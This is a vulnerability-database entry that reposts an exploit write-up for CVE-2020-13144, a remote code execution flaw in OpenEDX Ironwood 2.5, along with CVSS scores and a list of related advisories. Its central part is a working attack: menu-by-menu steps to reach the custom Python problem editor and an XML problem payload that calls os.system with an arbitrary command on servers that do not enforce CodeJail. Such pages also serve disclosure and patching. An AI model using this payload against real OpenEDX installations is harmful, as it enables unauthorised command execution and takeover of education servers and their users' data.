Lucene search
0daydb.com0DAYDB:7673EE0281A214ED87D52BA25B8C65BAHistoryMay 24, 2020 - 3:29 p.m.
OpenEDX Ironwood 2.5 CVE-2020-13144 - Remote Code Execution
2020-05-2415:29:52
0daydb.com
0daydb.com
97
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
OpenEDX platform Ironwood version 2.5 suffers from a remote code execution vulnerability.
# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-20
# Exploit Author: Daniel MonzΓ³n (stark0de)
# Vendor Homepage: https://open.edx.org/
# Software Link: https://github.com/edx/edx-platform
# Version: Ironwood 2.5
# Tested on: Debian x64
# CVE : CVE-2020-13144
CVE ID: CVE-2020-13144
OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced
This is an authenticated vulnerability, so you need to register an account, go to /edx-studio
Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code
Once here we just need to edit the problem and introduce a payload such as:
<problem>
<script type="python">
def test_add(expect,ans):
import os
os.system("thecommandyouwanttoexecute")
</script>
<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
<textline size="10" correct_answer="11" label="Integer #1"/><br/>
<textline size="10" correct_answer="9" label="Integer #2"/>
</customresponse>
<solution>
<div class="detailed-solution">
<p>Solution or Explanation Heading</p>
<p>Solution or explanation text</p>
</div>
</solution>
</problem>
And click Submit, and you will execute commands in the machineRelated
0daydb
0daydb
WebLogic Server CVE-2020-2555 - Remote Code Execution
2020-05-24 15:30:56
PHP-Fusion 9.03.50 - Cross Site Scripting
2020-05-24 15:24:42
Gym Management System 1.0 - Remote Code Execution
2020-05-25 14:05:47
packetstorm
packetstorm
OpenEDX Ironwood 2.5 Remote Code Execution
2020-05-20 00:00:00
Oracle WebLogic Server 12.2.1.4.0 Remote Code Execution
2020-04-14 00:00:00
WebLogic Server Deserialization Remote Code Execution
2020-05-21 00:00:00
zdt
zdt
OpenEDX platform Ironwood 2.5 - Remote Code Execution Vulnerability
2020-05-21 00:00:00
Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution Exploit
2020-04-14 00:00:00
Oracle Coherence Fusion Middleware Remote Code Execution Exploit
2020-04-03 00:00:00
prion
prion
Code injection
2020-05-18 19:15:00
Design/Logic Flaw
2020-01-15 17:15:00
cve
cve
CVE-2020-13144
2020-05-18 19:15:00
CVE-2020-2555
2020-01-15 17:15:00
saint
saint
Oracle WebLogic Server BadAttributeValueExpException deserialization
2020-05-27 00:00:00
Oracle WebLogic Server BadAttributeValueExpException deserialization
2020-05-27 00:00:00
Oracle WebLogic Server BadAttributeValueExpException deserialization
2020-05-27 00:00:00
githubexploit
githubexploit
Exploit for Deserialization of Untrusted Data in Oracle Webcenter Portal
2020-09-18 12:37:20
Exploit for Vulnerability in Oracle Coherence
2021-01-27 01:24:52
Exploit for Vulnerability in Oracle Weblogic Server
2020-12-30 01:55:52
zdi
zdi
nessus
nessus
Oracle Coherence (Jan 2020 CPU)
2020-06-26 00:00:00
Oracle Access Manager Multiple Vulnerabilities (Jul 2021 CPU)
2021-07-22 00:00:00
Oracle WebCenter Portal Multiple Vulnerabilities (Oct 2020 CPU)
2020-11-03 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle Weblogic Insecure Deserialization (CVE-2020-2555)
2020-04-05 00:00:00
symantec
symantec
Oracle Coherence CVE-2020-2555 Multiple Remote Security Vulnerabilities
2020-01-14 00:00:00
cisa_kev
cisa_kev
Oracle Multiple Products Remote Code Execution Vulnerability
2021-11-03 00:00:00
metasploit
metasploit
WebLogic Server Deserialization RCE - BadAttributeValueExpException
2020-05-04 15:34:15
exploitdb
exploitdb
OpenEDX platform Ironwood 2.5 - Remote Code Execution
2020-05-21 00:00:00
WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)
2020-05-22 00:00:00
Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
2020-04-14 00:00:00
attackerkb
attackerkb
CVE-2020-2883
2020-04-15 00:00:00
CVE-2020-2555
2020-01-15 00:00:00
rapid7blog
rapid7blog
Metasploit 2020 Wrap-Up
2020-12-30 15:38:00
threatpost
threatpost
Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks
2020-10-21 20:31:17
qualysblog
qualysblog
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
2020-10-22 23:10:29
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
ics
ics
Potential for China Cyber Response to Heightened U.S.βChina Tensions
2020-10-20 12:00:00
kitploit
kitploit
Vulmap - Web Vulnerability Scanning And Verification Tools
2020-12-25 11:30:00
oracle
oracle
Oracle Critical Patch Update Advisory - January 2021
2021-01-19 00:00:00
Oracle Critical Patch Update Advisory - January 2020
2020-01-14 00:00:00
Oracle Critical Patch Update Advisory - July 2021
2021-07-20 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for 0DAYDB:7673EE0281A214ED87D52BA25B8C65BA